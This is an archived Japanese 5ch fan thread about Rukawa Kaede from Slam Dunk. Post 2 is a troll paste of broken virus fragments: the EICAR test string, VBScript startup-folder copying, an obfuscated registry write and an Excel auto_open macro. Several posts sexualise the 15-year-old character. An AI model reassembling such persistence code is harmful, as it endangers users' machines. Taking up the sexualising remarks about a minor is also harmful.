5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【どあほう】流川楓スレ3【フー…ヤレヤレ】

1 :名無しかわいいよ名無し:2007/10/29(月) 23:48:53 ID:7+SKsFay
落ちてたんで立てました

2 :名無しかわいいよ名無し:2007/10/30(火) 02:50:31 ID:ePlz4WOl
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


3 :名無しかわいいよ名無し:2007/10/30(火) 11:31:26 ID:dV6yjPUN
ちょ、どこいった??とか思ったらやっぱり落ちてしまってたのか(´・ω・`)

4 :名無しかわいいよ名無し:2007/10/30(火) 17:18:21 ID:thpVo2nI
>>3
【天上天下】スラムダンクの流川楓はどあほうカッコイイ【唯我独尊】
のこと?

5 :名無しかわいいよ名無し:2007/10/31(水) 12:53:08 ID:HIRkPoUT
ルカワ格好いいよルカワ

6 :名無しかわいいよ名無し:2007/10/31(水) 19:22:38 ID:V5qjhjGb
>>4
うん。

7 :名無しかわいいよ名無し:2007/10/31(水) 20:40:06 ID:UAEW6/7R
保守

8 :名無しかわいいよ名無し:2007/11/01(木) 03:01:12 ID:U4SZzCBN
流川様、大好き

9 :名無しかわいいよ名無し:2007/11/01(木) 03:54:52 ID:mcG0m43Y
中学生の時の流川はどんなかんじだったんだろ。やっぱり部活以外は寝てたのかな?

10 :名無しかわいいよ名無し:2007/11/01(木) 06:35:01 ID:9+uDAV9Y
>>1
>>9多分そうだろうね

11 :名無しかわいいよ名無し:2007/11/01(木) 06:37:12 ID:9+uDAV9Y
11ゲト

12 :名無しかわいいよ名無し:2007/11/01(木) 16:54:44 ID:h6p34u9o
>>6
ありがとう。

13 :名無しかわいいよ名無し:2007/11/02(金) 06:50:48 ID:afTZQbRK
一月生まれってことは15歳だよね。メンタル面しっかりしてるし、セクシーすぎる。

14 :名無しかわいいよ名無し:2007/11/03(土) 07:24:11 ID:DgSDiyXa
同意

つーか過疎ってんなぁ

15 :名無しかわいいよ名無し:2007/11/03(土) 07:53:56 ID:DgSDiyXa
今日さいもえらしいですよ

まとめサイト ttp://sakura.45.kg/mangasaimoe/
コード発行所 ttp://tcode.sakura.ne.jp/comic/

16 :名無しかわいいよ名無し:2007/11/03(土) 10:23:22 ID:joKH4bT+
わかる!セクシーだよね。てかグラマー。
もう、この世の女は彼のために存在してるってことでいい。

17 :名無しかわいいよ名無し:2007/11/03(土) 13:52:15 ID:SLiss7RV
グラマー?!

18 :名無しかわいいよ名無し:2007/11/03(土) 15:53:26 ID:jk5x/2l4
セクシーはわかるんだが…

19 :名無しかわいいよ名無し:2007/11/03(土) 22:30:42 ID:joKH4bT+
中身が詰まってる感じで、豊満ていうか…15歳相手に何をorz

20 :名無しかわいいよ名無し:2007/11/03(土) 23:28:40 ID:eQ53lc0C
グラマーにしろ豊満にしろ女性に対して使う言葉でしょ

21 :名無しかわいいよ名無し:2007/11/04(日) 03:04:33 ID:AqKPusoF
どっちかっつーとスマートな印象なんだが

22 :名無しかわいいよ名無し:2007/11/04(日) 07:35:59 ID:fXFhy8MI
うん。ごめん

23 :名無しかわいいよ名無し:2007/11/04(日) 09:05:31 ID:YZyNrP8o
鍛えられてて引き締まってるみたいなことがいいたかったんかな

安西先生は豊満だとは思うよ

24 :名無しかわいいよ名無し:2007/11/04(日) 14:53:06 ID:kLesf1jB
腹が豊満だな。

25 :名無しかわいいよ名無し:2007/11/04(日) 15:32:24 ID:fSewVZ02
しっかり鍛えてるけど仙道や牧らに比べると全体的に細い
そういうとこをみるとやっぱ15歳なんだなと思う

26 :名無しかわいいよ名無し:2007/11/04(日) 18:39:25 ID:69s16PWX
そんな発展途上なところもたまらん!
リアル15歳を見てもそんなことは思わないけどね。

27 :名無しかわいいよ名無し:2007/11/04(日) 21:14:23 ID:7y9546Wu
数ヶ月前まではまだ中学生だからな

28 :名無しかわいいよ名無し:2007/11/05(月) 02:14:44 ID:iMOGXcfS
15歳って言われてハッとした
自分いつの間にかかなり年上じゃないか…小学生の時からずっと憧れだったのにorz

29 :名無しかわいいよ名無し:2007/11/05(月) 12:14:30 ID:nNDr/cWo
読み出した時がタメか一歳下くらいだったかなぁ。
もう一回り上だw

30 :名無しかわいいよ名無し:2007/11/05(月) 13:26:15 ID:MhkpYI7T
はじめて流川をみたときはなんかかっこいい!ぐらいにしか思ってなかった
あれから十数年・・・あの時以上に大好きだよ
私も年をとったもんだw

31 :名無しかわいいよ名無し:2007/11/06(火) 00:00:31 ID:PKcMnsuo
彼はバスケ部の中野浩一

32 :名無しかわいいよ名無し:2007/11/06(火) 07:10:18 ID:83lw/y7L
今日はさいもえですよ>>15


33 :名無しかわいいよ名無し:2007/11/06(火) 19:15:52 ID:83lw/y7L
さいもえで支援見させてもらったけどつくづくかっこいい奴だな

34 :名無しかわいいよ名無し:2007/11/06(火) 23:22:34 ID:YrQl5i8J
1位通過!

35 :名無しかわいいよ名無し:2007/11/07(水) 01:22:22 ID:85cWQoAv
流川ってそんなに人気あったのか…。
自分の周りは三井派ばっかだったからあまり人気ないのかと思ってた。

36 :名無しかわいいよ名無し:2007/11/07(水) 01:33:10 ID:58LaAiD5
こういう切れ長目のクールなスポーツマンタイプ好きだわ。
でも近年の傾向として目のパチッくりっとした女の子的な可愛さの男がモテるよね。
せっかく切れ長だった人も丸目に整形したりしてさ…
ルカワみたいなのは貴重になってきてる

37 :名無しかわいいよ名無し:2007/11/07(水) 12:22:21 ID:pguZ15+v
>>35
女子校だったが流川がダントツ人気で次が仙道だったよ


38 :名無しかわいいよ名無し:2007/11/07(水) 17:31:55 ID:IsBhGroA
流川さん大好きす

39 :名無しかわいいよ名無し:2007/11/07(水) 19:56:45 ID:bsIDbzC8
>>37
いいなぁ。あの頃仙道好きだったけど周りは三井と流川ばっかだった。
でも今は流川が一番好きだ。あのストイックさが萌える。

40 :名無しかわいいよ名無し:2007/11/07(水) 20:47:39 ID:qTiuU9ef
負けず嫌いだし自己中だしストイックとは程遠い気が

41 :名無しかわいいよ名無し:2007/11/07(水) 23:07:13 ID:NqsHJ2bR
ストイックとは違うかもね。バスケには貪欲だし、やりたくないことは
やらないし。でも自己中というのとも違うような。
自分が年取ってきたからか、流川ってほんとは年相応に可愛いなと感じてきた。

42 :名無しかわいいよ名無し:2007/11/07(水) 23:52:17 ID:qTiuU9ef
そうだね。自己中というか、ワガママって意味じゃなくて
マイペースってことを言いたかったんだ。
そんなところが好きさ

43 :名無しかわいいよ名無し:2007/11/09(金) 09:07:13 ID:Vud/hiLv
精神的にも強くて、不満も言わないとことか大人だなと思うけど、
バカなとことか年相応のガキっぽいとこもあって萌える。

44 :名無しかわいいよ名無し:2007/11/09(金) 20:56:40 ID:z7cFJJ2Z
連載してた当時は誰が1番人気だったんだ?
最近スラダンにはまったもんで

45 :名無しかわいいよ名無し:2007/11/10(土) 13:07:03 ID:7sWipebh
連載当時読んでたけど忘れた…
周りは流川が一番人気で次に仙道、ミッチー、リョータだった。

46 :名無しかわいいよ名無し:2007/11/10(土) 14:52:28 ID:IDgq29Ul
楓パープルって何に掲載されているかわかりますか?

47 :名無しかわいいよ名無し:2007/11/10(土) 17:42:36 ID:Sv2oV0HU
カメレオンジェイルに収録されているよ
私が持ってる古いジャンプコミックスのほうだと一巻に収録されてる
新装版(1000円ぐらいのほう)にも入っているらしい

48 :名無しかわいいよ名無し:2007/11/10(土) 21:36:01 ID:5gKHpl43
流川って1日何時間くらい寝てるんだろうか

49 :名無しかわいいよ名無し:2007/11/10(土) 22:51:54 ID:nd1cqgz2
朝、6時頃に起きて自主練習
7時半、部活で朝練
8時半、朝のHRお眠り開始
1時間目〜4時間目、爆睡
昼休み、お弁当食べてお昼寝開始
5〜6時間目、爆睡。起きたら授業が終わっていたというオチ

どうしても授業中ずっと寝てそうなイメージがww

50 :名無しかわいいよ名無し:2007/11/10(土) 23:02:58 ID:IDgq29Ul
ありがとうございます!
今度見てみます!

51 :名無しかわいいよ名無し:2007/11/10(土) 23:42:44 ID:X3J8CYq5
しかしあらゆる意味に置いて今の流川の影は微塵もないから見る際はそれなりの覚悟をおすすめする。
楓パープルはまだしも流川が演劇部の設定のやつはかなりキモかったなー……。

52 :名無しかわいいよ名無し:2007/11/10(土) 23:56:16 ID:IDgq29Ul
え!?
流川が演劇部だったんですか?それは何という作品ですか?

53 :名無しかわいいよ名無し:2007/11/11(日) 03:31:04 ID:/014wEAB
名前が同じなだけで、あれは全く別ものだとオモw
初めて読んだ時少女漫画みたいとか思った。

54 :名無しかわいいよ名無し:2007/11/11(日) 08:53:39 ID:UY0h0F05
>>49
で、7時か8時まで部活でその後更に自主練ってかんじか。
運動以外はほぼ寝てるって仔猫みたいだw

55 :名無しかわいいよ名無し:2007/11/11(日) 20:44:28 ID:ciQmKOIX
>>52
ちょっとはググろうね。

56 :名無しかわいいよ名無し:2007/11/12(月) 14:03:24 ID:dEX6HE/0
もう喧嘩はしないかね? って聞かれて
「たぶん」って答えんのがなんかよかったw
襲撃された時真っ先に手出したのが意外だったな。

57 :名無しかわいいよ名無し:2007/11/12(月) 17:22:13 ID:uMXOY86Z
やっぱしそうだな

58 :名無しかわいいよ名無し:2007/11/12(月) 23:17:13 ID:O/UvMI/F
白いユニフォームの時のスパッツみたいなやつ、ぱっと見だと白いニーハイを履いているように見えるのは自分だけか…

59 :名無しかわいいよ名無し:2007/11/13(火) 10:11:03 ID:W75lweN6
本日はさいもえ投票日です。よろしく。
まとめサイト ttp://sakura.45.kg/mangasaimoe/
コード発行所 ttp://tcode.sakura.ne.jp/comic/

60 :名無しかわいいよ名無し:2007/11/13(火) 19:30:41 ID:a//KT3ER
ルカワ!ルカワ!L・O・V・E・ルカワ!



61 :名無しかわいいよ名無し:2007/11/14(水) 07:03:21 ID:2xU+ViO6
おしかったな

62 :名無しかわいいよ名無し:2007/11/15(木) 10:28:03 ID:e8KBgOcx
汗だくでハァハァいってる姿がエロいな

63 :名無しかわいいよ名無し:2007/11/15(木) 19:35:35 ID:zNKDNAvK
翔陽戦で、みんなガチガチ状態になってる時、翔陽の選手2人かわしてシュート決める前の半開きの口がエロい

64 :名無しかわいいよ名無し:2007/11/16(金) 18:17:36 ID:edbVTTBI
確かにあの表情好きかっこいい

65 :名無しかわいいよ名無し:2007/11/18(日) 01:38:44 ID:fmG6R7DR
クールなルカワが、桜木がダンク決める時、ベンチから立ち上がって「ぶちかませ!」って叫んだところよかった。


66 :名無しかわいいよ名無し:2007/11/18(日) 08:56:36 ID:ZHA3pn68
風呂でも寝てるだろ絶対
よく朝練には起きられるよなぁ

67 :名無しかわいいよ名無し:2007/11/18(日) 13:41:59 ID:hb2k2KFm
バスケに関しては起きれるんだろうな。

もしくは母親が流川の部屋でドリブルしてその音が目覚まし変わりww

68 :名無しかわいいよ名無し:2007/11/18(日) 15:24:21 ID:S5nl2wCr
自演ならもっと分かりにくくやってくれ

69 :名無しかわいいよ名無し:2007/11/18(日) 16:27:44 ID:ZHA3pn68
>>67
中学時代決勝戦に寝坊したけどw
中学ん時は全国には行かなかったんだよね。>>68
よくわからんが仙道スレにもいただろ何日か前。


70 :名無しかわいいよ名無し:2007/11/19(月) 17:32:02 ID:CsmmSDL2
70
しっかし過疎ってんなぁ… 昔の漫画だもね

71 :名無しかわいいよ名無し:2007/11/20(火) 14:46:16 ID:fV0nbNAZ
大好きなんだがねぇ…。
やはり新しい刺激がないから会話がループしてしまうしな…。

72 :名無しかわいいよ名無し:2007/11/21(水) 06:45:56 ID:SOuMNfsz
>>69全中行ったって描写ないもね ルカワのワンマンチームだったからかな


73 :名無しかわいいよ名無し:2007/11/22(木) 07:45:43 ID:ili2kMDR
モテてる自覚とかあるんだろうか

74 :名無しかわいいよ名無し:2007/11/22(木) 14:42:38 ID:8tunoGF7
ないんじゃないか?
親衛隊のことも何か他人事のように見ていた印象がある


75 :名無しかわいいよ名無し:2007/11/22(木) 15:32:17 ID:fZU0yUyJ
自分の容姿のことなんか考えたこともないかも
でもそこがいい

76 :名無しかわいいよ名無し:2007/11/22(木) 20:11:53 ID:ZqQz3rDg
あんなにかっこいいのにそういうとこがいいんだな

77 :名無しかわいいよ名無し:2007/11/23(金) 10:28:48 ID:H6hUMMsz
流川って兄弟いるとしたら小学生くらいの妹がいそうだな
それか大学生の姉

78 :名無しかわいいよ名無し:2007/11/23(金) 10:56:37 ID:72PMuly3
http://enjoi.blogdns.net/up/src/1443.jpg

79 :名無しかわいいよ名無し:2007/11/23(金) 21:16:40 ID:BfqSW8qF
背も高し(^^)

80 :名無しかわいいよ名無し:2007/11/24(土) 08:08:07 ID:jtp8V6WZ
親衛隊が流川くーんって言ったらチラッと視線を向けたことはあったね
キャーキャー言われてるけどどうでもいいしくだらねーとか思ってんのかな
>>77 姉ちゃんいそう。なんか弟っぽいんだよな。


81 :名無しかわいいよ名無し:2007/11/24(土) 17:11:50 ID:mt/ktlba
>>80
あったな。まだ流川親衛隊が親衛隊に進化する前(笑)に一回だけ呼んだら振り向いてくれたけど、それ以降の方が声的にはすごいのに全く反応すらなくなった。流川はもう完璧無視を決めこんだらどんな声も鼓膜には届かないのだろうかと思うくらいすごいスルーっぷり。

82 :名無しかわいいよ名無し:2007/11/24(土) 17:14:25 ID:mt/ktlba
すまんsage忘れた。

83 :名無しかわいいよ名無し:2007/11/25(日) 05:27:47 ID:4IW/V1um
流川とバスケットとの出会いを知りたい。やはり中学生の時か


84 :名無しかわいいよ名無し:2007/11/25(日) 06:24:26 ID:Q421ANT7
ミニバスやってたかも

85 :名無しかわいいよ名無し:2007/11/25(日) 11:35:06 ID:zqy8AQKO
中学入ってきたときすでにうまかったって彩子さんが

86 :名無しかわいいよ名無し:2007/11/26(月) 01:25:04 ID:P+CVZqjn
女なんか全く興味ねーみたいな感じだけど、実際誰かと付き合うようになったら物凄い洗練された美人と付き合いそう
松雪泰子みたいな感じの。可愛い系ミーハー娘や普通系女子といるところが一切想像できん
本人は意識してないんだけど潜在的面食いっぽい

87 :名無しかわいいよ名無し:2007/11/26(月) 06:37:22 ID:+lB89cwd
小学生の時のポートボールがきっかけかも

88 :名無しかわいいよ名無し:2007/11/26(月) 07:31:51 ID:KZM1GX9R
あーあったねポートボールって。ルールとか思い出せないけど。
>>86わかる。性格サッパリしてるすんごい美人と付き合いそう。
無意識的に可愛らしい子〜普通〜ドブスは華麗にスルー

89 :名無しかわいいよ名無し:2007/11/26(月) 11:17:37 ID:8Pf0u3EH
ファッション誌に載ってるいわゆるモテカワギャルwにはまったく興味がなさそうだよね

90 :名無しかわいいよ名無し:2007/11/27(火) 01:25:45 ID:bVo0zPYY
流川大好き。アニメので試合終わってみんなで寝てる画とか神。

91 :名無しかわいいよ名無し:2007/11/27(火) 02:41:20 ID:TGp3ypWr
あの絵なら原作のって言ってよ

92 :名無しかわいいよ名無し:2007/11/27(火) 15:08:15 ID:9CbzMO2k
アニメだとエンディングでチャリ乗って音楽聴いてる絵好きだった。
あの時代はCDだね。今だったら確実にipodユーザーだろうな。

93 :名無しかわいいよ名無し:2007/11/28(水) 22:18:32 ID:wxdFO4/7
勉強の成績は花道よりちょっといいくらいかな?
アホで喧嘩っ早いとこもカワユス

94 :名無しかわいいよ名無し:2007/11/29(木) 00:33:39 ID:GXtdpCMr
アニメで流川の汗だけキラキラ光ってんのがギャグとしか思えない

95 :名無しかわいいよ名無し:2007/11/29(木) 08:02:21 ID:zJOqhSsv
「なに縮こまってんだ」とかのシーンとか愛を感じる。

流川はクールだけどどこか優しいとこが好き。



96 :名無しかわいいよ名無し:2007/11/29(木) 22:43:32 ID:X0uJVF3R
オイラのNO1はやっぱ「ぶちかませ!」かなー

97 :名無しかわいいよ名無し:2007/11/29(木) 23:00:21 ID:x8qprFTO
陵南戦後半、仙道と点取り合いでスコア指して 「開いたぜ、どうする?」
かっこいい。算数じゃねぇ はちょっとワラタけどw算数ってあーた
あとどっかで言った「役不足」はイノタケとルカワどっちがアホなんだろう


98 :名無しかわいいよ名無し:2007/11/30(金) 00:03:58 ID:bNs9JC54
豊玉戦で感覚だけでシュート打つところ好きだ
あと海南戦で一人で得点しまくるところ
アニメ久々に見たけどやっぱりカッコヨス 声最高

99 :名無しかわいいよ名無し:2007/11/30(金) 00:10:53 ID:WY3ZbIQF
>>97
アフォはイノタケと編集だろ
流川に罪はない

100 :名無しかわいいよ名無し:2007/11/30(金) 00:49:16 ID:UVI5PGB5
お前ら…

101 :名無しかわいいよ名無し:2007/11/30(金) 14:53:43 ID:LiFEWwk1
自分も「ぶちかませ!」だな〜
いつもクールな流川が唯一叫んだシーンじゃないか?


102 :名無しかわいいよ名無し:2007/12/02(日) 06:46:50 ID:JK/A89g6
何気に桜木認めてるとこあるしフォローするし優しいよな


103 :名無しかわいいよ名無し:2007/12/03(月) 03:32:40 ID:+HtoA0kU
あ〜久しぶりに読み返して流川のかっこよさを再認識した
もっと語り合いたいのだが人がいない…
誰かいないか?

104 :名無しかわいいよ名無し:2007/12/03(月) 06:35:56 ID:ANdoN3G7
いるいる!流川マジかこよす(*´Д`*)

105 :名無しかわいいよ名無し:2007/12/03(月) 08:50:37 ID:ZB835JdO
いるよー 連載当時も 一番好きだったけど久々に読んでもやっぱり一番好き かっこよすぎだろ

106 :名無しかわいいよ名無し:2007/12/03(月) 09:35:09 ID:6l2uxzHG
山王戦#252の「ぶっつぶす」といってる流川の顔最高にいい
ゾクゾクする

107 :名無しかわいいよ名無し:2007/12/03(月) 14:20:33 ID:ANdoN3G7
流川は色っぽすぎる。尋常じゃない。

108 :名無しかわいいよ名無し:2007/12/03(月) 22:43:20 ID:GQjd3aUy
あと一ヵ月で流川の誕生日

109 :名無しかわいいよ名無し:2007/12/04(火) 13:29:05 ID:AK+6djm4
連載当時は中学生で、流川はかっこいいけど自分の手には負えない感じがしてた。
逆に今ならかわいがってあげられそうな気がする。真っ直ぐさを守ってやりたいというか。
そんな私は30代…

18 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)